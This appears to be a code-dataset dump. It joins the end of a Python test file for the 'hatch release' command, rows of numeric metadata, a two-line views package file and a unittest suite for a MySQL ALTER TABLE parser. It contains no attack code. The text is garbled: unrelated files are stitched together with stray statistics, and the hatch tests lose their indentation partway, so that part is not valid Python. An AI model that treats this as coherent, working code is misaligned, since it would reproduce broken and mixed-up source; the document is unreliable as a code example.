        assert result.exit_code == 1
        assert 'There are no local packages available.' in result.output
@requires_internet
def test_local_multiple():
    with temp_chdir() as d:
        runner = CliRunner()
        runner.invoke(hatch, ['new', 'ok', '--basic', '-ne'])
        runner.invoke(hatch, ['new', 'ko', '--basic', '-ne'])
        venv_dir = os.path.join(d, 'venv')
        create_venv(venv_dir)
        with venv(venv_dir):
            install_packages(['-e', os.path.join(d, 'ok')])
            install_packages(['-e', os.path.join(d, 'ko')])
            result = runner.invoke(hatch, ['release', '-l'])
        assert result.exit_code == 1
        assert (
            'There are multiple local packages available. '
            'Select one with the optional argument.'
        ) in result.output
@requires_internet
def test_path_relative():
    with temp_chdir():
        runner = CliRunner()
        runner.invoke(hatch, ['init', PACKAGE_NAME, '--basic', '-ne'])
        runner.invoke(hatch, ['build'])
        with env_vars(ENV_VARS):
            result = runner.invoke(hatch, ['release', '-p', 'dist', '-u', USERNAME, '-t'])
            print(result.output)
        assert result.exit_code == 0
@requires_internet
def test_path_full():
    with temp_chdir() as d:
        runner = CliRunner()
        runner.invoke(hatch, ['new', PACKAGE_NAME, '--basic', '-ne'])
        runner.invoke(hatch, ['new', 'ko', '--basic', '-ne'])
runner.invoke(hatch, ['build', '-p', PACKAGE_NAME])
build_dir = os.path.join(d, PACKAGE_NAME, 'dist')
os.chdir(os.path.join(d, 'ko'))
with env_vars(ENV_VARS):
result = runner.invoke(hatch, ['release', '-p', build_dir, '-u', USERNAME, '-t'])
assert result.exit_code == 0
def test_path_full_not_exist():
with temp_chdir() as d:
runner = CliRunner()
runner.invoke(hatch, ['new', PACKAGE_NAME, '--basic', '-ne'])
full_path = os.path.join(d, 'dist')
result = runner.invoke(hatch, ['release', '-p', full_path])
assert result.exit_code == 1
assert 'Directory `{}` does not exist.'.format(full_path) in result.output
@requires_internet
def test_config_username():
with temp_chdir() as d:
runner = CliRunner()
runner.invoke(hatch, ['init', PACKAGE_NAME, '--basic', '-ne'])
runner.invoke(hatch, ['build'])
with temp_move_path(SETTINGS_FILE, d):
settings = copy_default_settings()
settings['pypi_username'] = USERNAME
save_settings(settings)
with env_vars(ENV_VARS):
result = runner.invoke(hatch, ['release', '-p', 'dist', '-t'])
assert result.exit_code == 0
def test_config_not_exist():
with temp_chdir() as d:
runner = CliRunner()
runner.invoke(hatch, ['init', PACKAGE_NAME, '--basic', '-ne'])
runner.invoke(hatch, ['build'])
with temp_move_path(SETTINGS_FILE, d):
with env_vars(ENV_VARS):
result = runner.invoke(hatch, ['release', '-p', 'dist', '-t'])
assert result.exit_code == 1
assert 'Unable to locate config file. Try `hatch config --restore`.' in result.output
def test_config_username_empty():
with temp_chdir() as d:
runner = CliRunner()
runner.invoke(hatch, ['init', PACKAGE_NAME, '--basic', '-ne'])
runner.invoke(hatch, ['build'])
with temp_move_path(SETTINGS_FILE, d):
settings = copy_default_settings()
settings['pypi_username'] = ''
save_settings(settings)
with env_vars(ENV_VARS):
result = runner.invoke(hatch, ['release', '-p', 'dist', '-t'])
assert result.exit_code == 1
assert (
'A username must be supplied via -u/--username, '
'in {} as pypi_username, or in the TWINE_USERNAME environment variable.'.format(SETTINGS_FILE)
) in result.output
def test_strict():
with temp_chdir():
runner = CliRunner()
runner.invoke(hatch, ['init', PACKAGE_NAME, '--basic', '-ne'])
runner.invoke(hatch, ['build'])
with env_vars(ENV_VARS):
result = runner.invoke(hatch, ['release', '-p', 'dist', '-u', USERNAME, '-t', '-s'])
assert result.exit_code == 1
def test_repository_local():
with temp_chdir() as d:
runner = CliRunner()
runner.invoke(hatch, ['new', PACKAGE_NAME, '--basic', '-ne'])
runner.invoke(hatch, ['build', '-p', PACKAGE_NAME])
package_dir = os.path.join(d, PACKAGE_NAME)
venv_dir = os.path.join(d, 'venv')
create_venv(venv_dir)
# Make sure there's no configuration
with temp_move_path(os.path.expanduser("~/.pypirc"), d):
with venv(venv_dir, evars=ENV_VARS):
install_packages(['-e', package_dir])
# Will error, since there's no configuration parameter for
# this URL
result = runner.invoke(hatch, ['release', '-l', '-u', USERNAME, '-r', TEST_REPOSITORY])
assert result.exit_code == 1
@requires_internet
def test_repository_url_local():
with temp_chdir() as d:
runner = CliRunner()
runner.invoke(hatch, ['new', PACKAGE_NAME, '--basic', '-ne'])
runner.invoke(hatch, ['build', '-p', PACKAGE_NAME])
package_dir = os.path.join(d, PACKAGE_NAME)
venv_dir = os.path.join(d, 'venv')
create_venv(venv_dir)
with venv(venv_dir, evars=ENV_VARS):
install_packages(['-e', package_dir])
result = runner.invoke(hatch, ['release', '-l', '-u', USERNAME,
'--repo-url', TEST_REPOSITORY])
assert result.exit_code == 0
@requires_internet
def test_repository_and_repository_url_local():
with temp_chdir() as d:
runner = CliRunner()
runner.invoke(hatch, ['new', PACKAGE_NAME, '--basic', '-ne'])
runner.invoke(hatch, ['build', '-p', PACKAGE_NAME])
package_dir = os.path.join(d, PACKAGE_NAME)
venv_dir = os.path.join(d, 'venv')
create_venv(venv_dir)
with venv(venv_dir, evars=ENV_VARS):
install_packages(['-e', package_dir])
result = runner.invoke(hatch, ['release', '-l', '-u', USERNAME,
'--repo', TEST_REPOSITORY,
'--repo-url', TEST_REPOSITORY])
assert result.exit_code == 0
@requires_internet
def test_repository_env_vars():
with temp_chdir() as d:
runner = CliRunner()
runner.invoke(hatch, ['new', PACKAGE_NAME, '--basic', '-ne'])
runner.invoke(hatch, ['build', '-p', PACKAGE_NAME])
package_dir = os.path.join(d, PACKAGE_NAME)
venv_dir = os.path.join(d, 'venv')
create_venv(venv_dir)
extra_env_vars = {'TWINE_REPOSITORY': TEST_REPOSITORY, 'TWINE_REPOSITORY_URL': TEST_REPOSITORY, **ENV_VARS}
with venv(venv_dir, evars=extra_env_vars):
install_packages(['-e', package_dir])
result = runner.invoke(hatch, ['release', '-l', '-u', USERNAME])
assert result.exit_code == 0
@requires_internet
def test_repository_and_test():
with temp_chdir() as d:
runner = CliRunner()
runner.invoke(hatch, ['new', PACKAGE_NAME, '--basic', '-ne'])
runner.invoke(hatch, ['build', '-p', PACKAGE_NAME])
package_dir = os.path.join(d, PACKAGE_NAME)
venv_dir = os.path.join(d, 'venv')
create_venv(venv_dir)
with venv(venv_dir, evars=ENV_VARS):
install_packages(['-e', package_dir])
result = runner.invoke(hatch, ['release', '-l', '-u', USERNAME,
'-r', TEST_REPOSITORY,
'-t'])
assert result.exit_code == 1
assert "Cannot specify both --test and --repo." in result.output
with venv(venv_dir, evars=ENV_VARS):
result = runner.invoke(hatch, ['release', '-l', '-u', USERNAME,
'--repo-url', TEST_REPOSITORY,
'-t'])
assert result.exit_code == 1
assert "Cannot specify both --test and --repo-url." in result.output
with venv(venv_dir, evars=ENV_VARS):
result = runner.invoke(hatch, ['release', '-l', '-u', USERNAME,
'-r', TEST_REPOSITORY,
'-ru', TEST_REPOSITORY,
'-t'])
assert result.exit_code == 1
assert "Cannot specify both --test and --repo." in result.output
assert "Cannot specify both --test and --repo-url." in result.output
| 34.299465
| 117
| 0.585672
| 1514
| 12828
| 4.758256
| 0.086526
| 0.096613
| 0.136868
| 0.036646
| 0.807607
| 0.778179
| 0.764853
| 0.737507
| 0.72543
| 0.70794
| 0
| 0.006297
| 0.269645
| 12828
| 373
| 118
| 34.391421
| 0.762621
| 0.007795
| 0
| 0.742754
| 0
| 0
| 0.12944
| 0.017369
| 0
| 0
| 0
| 0
| 0.115942
| 1
| 0.072464
| false
| 0.007246
| 0.032609
| 0
| 0.105072
| 0.003623
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
6b9d5d686bba19a7de897542b5459a77db5468f6
| 59
|
py
|
Python
|
tirelire-account/app/views/__init__.py
|
AgRenaud/tirelire
|
0ac42dbf735dea4ecb741057bd037c18657b95c7
|
[
"MIT"
] | null | null | null |
tirelire-account/app/views/__init__.py
|
AgRenaud/tirelire
|
0ac42dbf735dea4ecb741057bd037c18657b95c7
|
[
"MIT"
] | null | null | null |
tirelire-account/app/views/__init__.py
|
AgRenaud/tirelire
|
0ac42dbf735dea4ecb741057bd037c18657b95c7
|
[
"MIT"
] | null | null | null |
from app.views import account
from app.views import holder
| 19.666667
| 29
| 0.830508
| 10
| 59
| 4.9
| 0.6
| 0.285714
| 0.489796
| 0.734694
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.135593
| 59
| 2
| 30
| 29.5
| 0.960784
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 8
|
d419364f78c2d3e6bb683c7ba961f357ffe25afa
| 25,433
|
py
|
Python
|
tests/grammar/test_alter_table.py
|
Daniihh/sqlpyparser
|
aad1d613c02d4f8fa6b833c060a683cf7e194b1c
|
[
"MIT"
] | 28
|
2016-02-13T10:20:21.000Z
|
2022-03-10T02:41:58.000Z
|
tests/grammar/test_alter_table.py
|
Daniihh/sqlpyparser
|
aad1d613c02d4f8fa6b833c060a683cf7e194b1c
|
[
"MIT"
] | 22
|
2016-02-15T15:55:09.000Z
|
2017-09-12T13:49:17.000Z
|
tests/grammar/test_alter_table.py
|
Daniihh/sqlpyparser
|
aad1d613c02d4f8fa6b833c060a683cf7e194b1c
|
[
"MIT"
] | 16
|
2016-02-15T16:41:23.000Z
|
2021-05-18T04:51:52.000Z
|
# -*- encoding:utf-8 -*-
from __future__ import absolute_import, division, print_function, unicode_literals
import unittest
from mysqlparse.grammar.alter_table import alter_table_syntax
class AlterTableAddColumnSyntaxTest(unittest.TestCase):
def test_alter_table_add(self):
statement = alter_table_syntax.parseString("""
ALTER IGNORE TABLE test_test ADD col_no0 BIT(8) NOT NULL DEFAULT 0 FIRST,
ADD col_no1 LONGTEXT NOT NULL,
ADD col_no2 VARCHAR(200) NULL,
ADD col_no3 BIT(8) AFTER col0;
""")
self.assertTrue(statement.ignore)
self.assertEqual(statement.statement_type, 'ALTER')
self.assertEqual(statement.table_name, 'test_test')
self.assertEqual(statement.alter_specification[0].column_name, 'col_no0')
self.assertEqual(statement.alter_specification[0].column_position, 'FIRST')
self.assertEqual(statement.alter_specification[1].column_name, 'col_no1')
self.assertEqual(statement.alter_specification[1].column_position, 'LAST')
self.assertEqual(statement.alter_specification[2].column_name, 'col_no2')
self.assertEqual(statement.alter_specification[2].column_position, 'LAST')
self.assertEqual(statement.alter_specification[3].column_name, 'col_no3')
self.assertEqual(statement.alter_specification[3].column_position, 'col0')
def test_alter_table_add_column(self):
statement = alter_table_syntax.parseString("""
ALTER TABLE test_test ADD COLUMN col0 BIT(8) NOT NULL DEFAULT 0 FIRST,
ADD COLUMN col1 LONGTEXT NOT NULL,
ADD COLUMN col2 VARCHAR(200) NULL,
ADD COLUMN col3 BIT(8) AFTER col0;
""")
self.assertFalse(statement.ignore)
self.assertEqual(statement.statement_type, 'ALTER')
self.assertEqual(statement.table_name, 'test_test')
self.assertEqual(statement.alter_specification[0].column_name, 'col0')
self.assertEqual(statement.alter_specification[0].column_position, 'FIRST')
self.assertEqual(statement.alter_specification[1].column_name, 'col1')
self.assertEqual(statement.alter_specification[1].column_position, 'LAST')
self.assertEqual(statement.alter_specification[2].column_name, 'col2')
self.assertEqual(statement.alter_specification[2].column_position, 'LAST')
self.assertEqual(statement.alter_specification[3].column_name, 'col3')
self.assertEqual(statement.alter_specification[3].column_position, 'col0')
def test_alter_table_add_column_mixed(self):
statement = alter_table_syntax.parseString("""
ALTER TABLE test_test ADD col0 BIT(8) NOT NULL DEFAULT 0 FIRST,
ADD COLUMN col1 LONGTEXT NOT NULL,
ADD COLUMN col2 VARCHAR(200) NULL,
ADD col3 BIT(8) AFTER col0;
""")
self.assertFalse(statement.ignore)
self.assertEqual(statement.statement_type, 'ALTER')
self.assertEqual(statement.table_name, 'test_test')
self.assertEqual(statement.alter_specification[0].column_name, 'col0')
self.assertEqual(statement.alter_specification[0].column_position, 'FIRST')
self.assertEqual(statement.alter_specification[1].column_name, 'col1')
self.assertEqual(statement.alter_specification[1].column_position, 'LAST')
self.assertEqual(statement.alter_specification[2].column_name, 'col2')
self.assertEqual(statement.alter_specification[2].column_position, 'LAST')
self.assertEqual(statement.alter_specification[3].column_name, 'col3')
self.assertEqual(statement.alter_specification[3].column_position, 'col0')
class AlterTableAddIndexSyntaxTest(unittest.TestCase):
def test_alter_table_add_index(self):
statement = alter_table_syntax.parseString("""
ALTER TABLE test_test ADD col0 BIT(8) NOT NULL DEFAULT 0 FIRST,
ADD INDEX index1 (col0, col1 (10), col2 (20) DESC);
""")
self.assertFalse(statement.ignore)
self.assertEqual(statement.statement_type, 'ALTER')
self.assertEqual(statement.table_name, 'test_test')
self.assertEqual(statement.alter_specification[0].column_name, 'col0')
self.assertEqual(statement.alter_specification[0].column_position, 'FIRST')
self.assertEqual(statement.alter_specification[1].alter_action, 'ADD INDEX')
self.assertEqual(statement.alter_specification[1].index_name, 'index1')
self.assertFalse(statement.alter_specification[1].index_type)
self.assertEqual(statement.alter_specification[1].index_columns[0].column_name, 'col0')
self.assertFalse(statement.alter_specification[1].index_columns[0].length)
self.assertFalse(statement.alter_specification[1].index_columns[0].direction)
self.assertEqual(statement.alter_specification[1].index_columns[1].column_name, 'col1')
self.assertEqual(statement.alter_specification[1].index_columns[1].length[0], '10')
self.assertFalse(statement.alter_specification[1].index_columns[1].direction)
self.assertEqual(statement.alter_specification[1].index_columns[2].column_name, 'col2')
self.assertEqual(statement.alter_specification[1].index_columns[2].length[0], '20')
self.assertEqual(statement.alter_specification[1].index_columns[2].direction, 'DESC')
def test_alter_table_add_index_index_type(self):
statement = alter_table_syntax.parseString("""
ALTER TABLE test_test ADD col0 BIT(8) NOT NULL DEFAULT 0 FIRST,
ADD INDEX index1 USING BTREE (col0, col1 (10), col2 (20) DESC);
""")
self.assertFalse(statement.ignore)
self.assertEqual(statement.statement_type, 'ALTER')
self.assertEqual(statement.table_name, 'test_test')
self.assertEqual(statement.alter_specification[0].column_name, 'col0')
self.assertEqual(statement.alter_specification[0].column_position, 'FIRST')
self.assertEqual(statement.alter_specification[1].alter_action, 'ADD INDEX')
self.assertEqual(statement.alter_specification[1].index_name, 'index1')
        self.assertEqual(statement.alter_specification[1].index_type[0], 'BTREE')  # the USING BTREE clause should populate index_type, as USING HASH does below
self.assertEqual(statement.alter_specification[1].index_columns[0].column_name, 'col0')
self.assertFalse(statement.alter_specification[1].index_columns[0].length)
self.assertFalse(statement.alter_specification[1].index_columns[0].direction)
self.assertEqual(statement.alter_specification[1].index_columns[1].column_name, 'col1')
self.assertEqual(statement.alter_specification[1].index_columns[1].length[0], '10')
self.assertFalse(statement.alter_specification[1].index_columns[1].direction)
self.assertEqual(statement.alter_specification[1].index_columns[2].column_name, 'col2')
self.assertEqual(statement.alter_specification[1].index_columns[2].length[0], '20')
self.assertEqual(statement.alter_specification[1].index_columns[2].direction, 'DESC')
def test_alter_table_add_index_index_option(self):
statement = alter_table_syntax.parseString("""
ALTER TABLE test_test ADD col0 BIT(8) NOT NULL DEFAULT 0 FIRST,
ADD INDEX index1 (col0, col1 (10), col2 (20) DESC)
KEY_BLOCK_SIZE=256
USING HASH
WITH PARSER some_parser
COMMENT 'test comment';
""")
self.assertFalse(statement.ignore)
self.assertEqual(statement.statement_type, 'ALTER')
self.assertEqual(statement.table_name, 'test_test')
self.assertEqual(statement.alter_specification[0].column_name, 'col0')
self.assertEqual(statement.alter_specification[0].column_position, 'FIRST')
self.assertEqual(statement.alter_specification[1].alter_action, 'ADD INDEX')
self.assertEqual(statement.alter_specification[1].index_name, 'index1')
self.assertEqual(statement.alter_specification[1].index_type[0], 'HASH')
self.assertEqual(statement.alter_specification[1].index_columns[0].column_name, 'col0')
self.assertFalse(statement.alter_specification[1].index_columns[0].length)
self.assertFalse(statement.alter_specification[1].index_columns[0].direction)
self.assertEqual(statement.alter_specification[1].index_columns[1].column_name, 'col1')
self.assertEqual(statement.alter_specification[1].index_columns[1].length[0], '10')
self.assertFalse(statement.alter_specification[1].index_columns[1].direction)
self.assertEqual(statement.alter_specification[1].index_columns[2].column_name, 'col2')
self.assertEqual(statement.alter_specification[1].index_columns[2].length[0], '20')
self.assertEqual(statement.alter_specification[1].index_columns[2].direction, 'DESC')
self.assertEqual(statement.alter_specification[1].key_block_size[0], '256')
self.assertEqual(statement.alter_specification[1].parser_name[0], 'some_parser')
self.assertEqual(statement.alter_specification[1].comment[0], 'test comment')
class AlterTableModifyColumnSyntaxTest(unittest.TestCase):
def test_alter_table_modify(self):
statement = alter_table_syntax.parseString("""
ALTER IGNORE TABLE test_test MODIFY col_no0 BIT(8) NOT NULL DEFAULT 0 FIRST,
MODIFY col_no1 LONGTEXT NOT NULL,
MODIFY col_no2 VARCHAR(200) NULL,
MODIFY col_no3 BIT(8) AFTER col0;
""")
self.assertTrue(statement.ignore)
self.assertEqual(statement.statement_type, 'ALTER')
self.assertEqual(statement.table_name, 'test_test')
self.assertEqual(statement.alter_specification[0].column_name, 'col_no0')
self.assertEqual(statement.alter_specification[0].column_position, 'FIRST')
self.assertEqual(statement.alter_specification[1].column_name, 'col_no1')
self.assertEqual(statement.alter_specification[1].column_position, 'LAST')
self.assertEqual(statement.alter_specification[2].column_name, 'col_no2')
self.assertEqual(statement.alter_specification[2].column_position, 'LAST')
self.assertEqual(statement.alter_specification[3].column_name, 'col_no3')
self.assertEqual(statement.alter_specification[3].column_position, 'col0')
def test_alter_table_modify_column(self):
statement = alter_table_syntax.parseString("""
ALTER TABLE test_test MODIFY COLUMN col0 BIT(8) NOT NULL DEFAULT 0 FIRST,
MODIFY COLUMN col1 LONGTEXT NOT NULL,
MODIFY COLUMN col2 VARCHAR(200) NULL,
MODIFY COLUMN col3 BIT(8) AFTER col0;
""")
self.assertFalse(statement.ignore)
self.assertEqual(statement.statement_type, 'ALTER')
self.assertEqual(statement.table_name, 'test_test')
self.assertEqual(statement.alter_specification[0].column_name, 'col0')
self.assertEqual(statement.alter_specification[0].column_position, 'FIRST')
self.assertEqual(statement.alter_specification[1].column_name, 'col1')
self.assertEqual(statement.alter_specification[1].column_position, 'LAST')
self.assertEqual(statement.alter_specification[2].column_name, 'col2')
self.assertEqual(statement.alter_specification[2].column_position, 'LAST')
self.assertEqual(statement.alter_specification[3].column_name, 'col3')
self.assertEqual(statement.alter_specification[3].column_position, 'col0')
def test_alter_table_modify_column_mixed(self):
statement = alter_table_syntax.parseString("""
ALTER TABLE test_test MODIFY col0 BIT(8) NOT NULL DEFAULT 0 FIRST,
MODIFY COLUMN col1 LONGTEXT NOT NULL,
MODIFY COLUMN col2 VARCHAR(200) NULL,
MODIFY col3 BIT(8) AFTER col0;
""")
self.assertFalse(statement.ignore)
self.assertEqual(statement.statement_type, 'ALTER')
self.assertEqual(statement.table_name, 'test_test')
self.assertEqual(statement.alter_specification[0].column_name, 'col0')
self.assertEqual(statement.alter_specification[0].column_position, 'FIRST')
self.assertEqual(statement.alter_specification[1].column_name, 'col1')
self.assertEqual(statement.alter_specification[1].column_position, 'LAST')
self.assertEqual(statement.alter_specification[2].column_name, 'col2')
self.assertEqual(statement.alter_specification[2].column_position, 'LAST')
self.assertEqual(statement.alter_specification[3].column_name, 'col3')
self.assertEqual(statement.alter_specification[3].column_position, 'col0')
class AlterTableChangeColumnSyntaxTest(unittest.TestCase):
def test_alter_table_change(self):
statement = alter_table_syntax.parseString("""
ALTER IGNORE TABLE test_test CHANGE col_no0 col_0 BIT(8) NOT NULL DEFAULT 0 FIRST,
CHANGE col_no1 col_1 LONGTEXT NOT NULL,
CHANGE col_no2 col_2 VARCHAR(200) NULL,
CHANGE col_no3 col_3 BIT(8) AFTER col0;
""")
self.assertTrue(statement.ignore)
self.assertEqual(statement.statement_type, 'ALTER')
self.assertEqual(statement.table_name, 'test_test')
self.assertEqual(statement.alter_specification[0].column_name, 'col_no0')
self.assertEqual(statement.alter_specification[0].new_column_name, 'col_0')
self.assertEqual(statement.alter_specification[0].column_position, 'FIRST')
self.assertEqual(statement.alter_specification[1].column_name, 'col_no1')
self.assertEqual(statement.alter_specification[1].new_column_name, 'col_1')
self.assertEqual(statement.alter_specification[1].column_position, 'LAST')
self.assertEqual(statement.alter_specification[2].column_name, 'col_no2')
self.assertEqual(statement.alter_specification[2].new_column_name, 'col_2')
self.assertEqual(statement.alter_specification[2].column_position, 'LAST')
self.assertEqual(statement.alter_specification[3].column_name, 'col_no3')
self.assertEqual(statement.alter_specification[3].new_column_name, 'col_3')
self.assertEqual(statement.alter_specification[3].column_position, 'col0')
def test_alter_table_change_column(self):
statement = alter_table_syntax.parseString("""
ALTER TABLE test_test CHANGE COLUMN col0 col_no0 BIT(8) NOT NULL DEFAULT 0 FIRST,
CHANGE COLUMN col1 col_no1 LONGTEXT NOT NULL,
CHANGE COLUMN col2 col_no2 VARCHAR(200) NULL,
CHANGE COLUMN col3 col_no3 BIT(8) AFTER col0;
""")
self.assertFalse(statement.ignore)
self.assertEqual(statement.statement_type, 'ALTER')
self.assertEqual(statement.table_name, 'test_test')
self.assertEqual(statement.alter_specification[0].column_name, 'col0')
self.assertEqual(statement.alter_specification[0].new_column_name, 'col_no0')
self.assertEqual(statement.alter_specification[0].column_position, 'FIRST')
self.assertEqual(statement.alter_specification[1].column_name, 'col1')
self.assertEqual(statement.alter_specification[1].new_column_name, 'col_no1')
self.assertEqual(statement.alter_specification[1].column_position, 'LAST')
self.assertEqual(statement.alter_specification[2].column_name, 'col2')
self.assertEqual(statement.alter_specification[2].new_column_name, 'col_no2')
self.assertEqual(statement.alter_specification[2].column_position, 'LAST')
self.assertEqual(statement.alter_specification[3].column_name, 'col3')
self.assertEqual(statement.alter_specification[3].new_column_name, 'col_no3')
self.assertEqual(statement.alter_specification[3].column_position, 'col0')
def test_alter_table_change_column_mixed(self):
statement = alter_table_syntax.parseString("""
ALTER TABLE test_test CHANGE col0 col_no0 BIT(8) NOT NULL DEFAULT 0 FIRST,
CHANGE COLUMN col1 col_no1 LONGTEXT NOT NULL,
CHANGE COLUMN col2 col_no2 VARCHAR(200) NULL,
CHANGE col3 col_no3 BIT(8) AFTER col0;
""")
self.assertFalse(statement.ignore)
self.assertEqual(statement.statement_type, 'ALTER')
self.assertEqual(statement.table_name, 'test_test')
self.assertEqual(statement.alter_specification[0].column_name, 'col0')
self.assertEqual(statement.alter_specification[0].new_column_name, 'col_no0')
self.assertEqual(statement.alter_specification[0].column_position, 'FIRST')
self.assertEqual(statement.alter_specification[1].column_name, 'col1')
self.assertEqual(statement.alter_specification[1].new_column_name, 'col_no1')
self.assertEqual(statement.alter_specification[1].column_position, 'LAST')
self.assertEqual(statement.alter_specification[2].column_name, 'col2')
self.assertEqual(statement.alter_specification[2].new_column_name, 'col_no2')
self.assertEqual(statement.alter_specification[2].column_position, 'LAST')
self.assertEqual(statement.alter_specification[3].column_name, 'col3')
self.assertEqual(statement.alter_specification[3].new_column_name, 'col_no3')
self.assertEqual(statement.alter_specification[3].column_position, 'col0')
class AlterTableDropSyntaxTest(unittest.TestCase):
def test_drop(self):
statement = alter_table_syntax.parseString(
"ALTER TABLE test_test DROP col_no0;"
)
self.assertFalse(statement.ignore)
self.assertEqual(statement.statement_type, 'ALTER')
self.assertEqual(statement.table_name, 'test_test')
self.assertEqual(statement.alter_specification[0].alter_action, 'DROP COLUMN')
self.assertEqual(statement.alter_specification[0].column_name, 'col_no0')
def test_drop_column(self):
statement = alter_table_syntax.parseString(
"ALTER TABLE test_test DROP COLUMN col_no0;"
)
self.assertFalse(statement.ignore)
self.assertEqual(statement.statement_type, 'ALTER')
self.assertEqual(statement.table_name, 'test_test')
self.assertEqual(statement.alter_specification[0].alter_action, 'DROP COLUMN')
self.assertEqual(statement.alter_specification[0].column_name, 'col_no0')
def test_drop_primary_key(self):
statement = alter_table_syntax.parseString(
"ALTER TABLE test_test DROP PRIMARY KEY;"
)
self.assertFalse(statement.ignore)
self.assertEqual(statement.statement_type, 'ALTER')
self.assertEqual(statement.table_name, 'test_test')
self.assertEqual(statement.alter_specification[0].alter_action, 'DROP PRIMARY KEY')
def test_drop_index(self):
statement = alter_table_syntax.parseString(
"ALTER TABLE test_test DROP INDEX idx_no0;"
)
self.assertFalse(statement.ignore)
self.assertEqual(statement.statement_type, 'ALTER')
self.assertEqual(statement.table_name, 'test_test')
self.assertEqual(statement.alter_specification[0].alter_action, 'DROP INDEX')
self.assertEqual(statement.alter_specification[0].index_name, 'idx_no0')
def test_drop_key(self):
statement = alter_table_syntax.parseString(
"ALTER TABLE test_test DROP KEY idx_no0;"
)
self.assertFalse(statement.ignore)
self.assertEqual(statement.statement_type, 'ALTER')
self.assertEqual(statement.table_name, 'test_test')
self.assertEqual(statement.alter_specification[0].alter_action, 'DROP INDEX')
self.assertEqual(statement.alter_specification[0].index_name, 'idx_no0')
def test_drop_foreign_key(self):
statement = alter_table_syntax.parseString(
"ALTER TABLE test_test DROP FOREIGN KEY fk_no0;"
)
self.assertFalse(statement.ignore)
self.assertEqual(statement.statement_type, 'ALTER')
self.assertEqual(statement.table_name, 'test_test')
self.assertEqual(statement.alter_specification[0].alter_action, 'DROP FOREIGN KEY')
self.assertEqual(statement.alter_specification[0].fk_symbol, 'fk_no0')
def test_drop_mixed(self):
statement = alter_table_syntax.parseString("""
ALTER TABLE test_test DROP col_no0,
DROP COLUMN col_no1,
DROP PRIMARY KEY,
DROP INDEX idx_no0,
DROP KEY idx_no1,
DROP FOREIGN KEY fk_no0;
""")
self.assertFalse(statement.ignore)
self.assertEqual(statement.statement_type, 'ALTER')
self.assertEqual(statement.table_name, 'test_test')
self.assertEqual(statement.alter_specification[0].alter_action, 'DROP COLUMN')
self.assertEqual(statement.alter_specification[0].column_name, 'col_no0')
self.assertEqual(statement.alter_specification[1].alter_action, 'DROP COLUMN')
self.assertEqual(statement.alter_specification[1].column_name, 'col_no1')
self.assertEqual(statement.alter_specification[2].alter_action, 'DROP PRIMARY KEY')
self.assertEqual(statement.alter_specification[3].alter_action, 'DROP INDEX')
self.assertEqual(statement.alter_specification[3].index_name, 'idx_no0')
self.assertEqual(statement.alter_specification[4].alter_action, 'DROP INDEX')
self.assertEqual(statement.alter_specification[4].index_name, 'idx_no1')
self.assertEqual(statement.alter_specification[5].alter_action, 'DROP FOREIGN KEY')
self.assertEqual(statement.alter_specification[5].fk_symbol, 'fk_no0')
class AlterTableDatabaseNameTest(unittest.TestCase):
def test_alter_table_database_name(self):
statement = alter_table_syntax.parseString("""
ALTER IGNORE TABLE test_db.test_test CHANGE col_no0 col_0 BIT(8) NOT NULL DEFAULT 0 FIRST,
CHANGE col_no1 col_1 LONGTEXT NOT NULL,
CHANGE col_no2 col_2 VARCHAR(200) NULL,
CHANGE col_no3 col_3 BIT(8) AFTER col0;
""")
self.assertTrue(statement.ignore)
self.assertEqual(statement.statement_type, 'ALTER')
self.assertEqual(statement.database_name, 'test_db')
self.assertEqual(statement.table_name, 'test_test')
self.assertEqual(statement.alter_specification[0].column_name, 'col_no0')
self.assertEqual(statement.alter_specification[0].new_column_name, 'col_0')
self.assertEqual(statement.alter_specification[0].column_position, 'FIRST')
self.assertEqual(statement.alter_specification[1].column_name, 'col_no1')
self.assertEqual(statement.alter_specification[1].new_column_name, 'col_1')
self.assertEqual(statement.alter_specification[1].column_position, 'LAST')
self.assertEqual(statement.alter_specification[2].column_name, 'col_no2')
self.assertEqual(statement.alter_specification[2].new_column_name, 'col_2')
self.assertEqual(statement.alter_specification[2].column_position, 'LAST')
self.assertEqual(statement.alter_specification[3].column_name, 'col_no3')
self.assertEqual(statement.alter_specification[3].new_column_name, 'col_3')
self.assertEqual(statement.alter_specification[3].column_position, 'col0')
class AlterTableRenameKeysIndexes(unittest.TestCase):
def test_rename_index(self):
statement = alter_table_syntax.parseString("""
ALTER TABLE test RENAME INDEX idx1 TO idx2;
""")
self.assertEqual(statement.statement_type, 'ALTER')
self.assertEqual(statement.table_name, 'test')
self.assertEqual(statement.alter_specification[0].old_index_name,
'idx1')
self.assertEqual(statement.alter_specification[0].new_index_name,
'idx2')
def test_rename_key(self):
statement = alter_table_syntax.parseString("""
ALTER TABLE test RENAME KEY key1 TO key2;
""")
self.assertEqual(statement.statement_type, 'ALTER')
self.assertEqual(statement.table_name, 'test')
self.assertEqual(statement.alter_specification[0].old_key_name, 'key1')
self.assertEqual(statement.alter_specification[0].new_key_name, 'key2')
def test_rename_mixed_index_key(self):
statement = alter_table_syntax.parseString("""
ALTER TABLE test
RENAME INDEX idx1 TO idx2,
RENAME KEY key1 TO key2;
""")
self.assertEqual(statement.statement_type, 'ALTER')
self.assertEqual(statement.table_name, 'test')
self.assertEqual(statement.alter_specification[0].old_index_name,
'idx1')
self.assertEqual(statement.alter_specification[0].new_index_name,
'idx2')
self.assertEqual(statement.alter_specification[1].old_key_name, 'key1')
self.assertEqual(statement.alter_specification[1].new_key_name, 'key2')
class AlterTableRename(unittest.TestCase):
def test_rename_table(self):
statements = [
"ALTER TABLE test1 RENAME test2;",
"ALTER TABLE test1 RENAME TO test2;",
"ALTER TABLE test1 RENAME AS test2;"
]
for statement in statements:
stmt = alter_table_syntax.parseString(statement)
self.assertEqual(stmt.statement_type, 'ALTER')
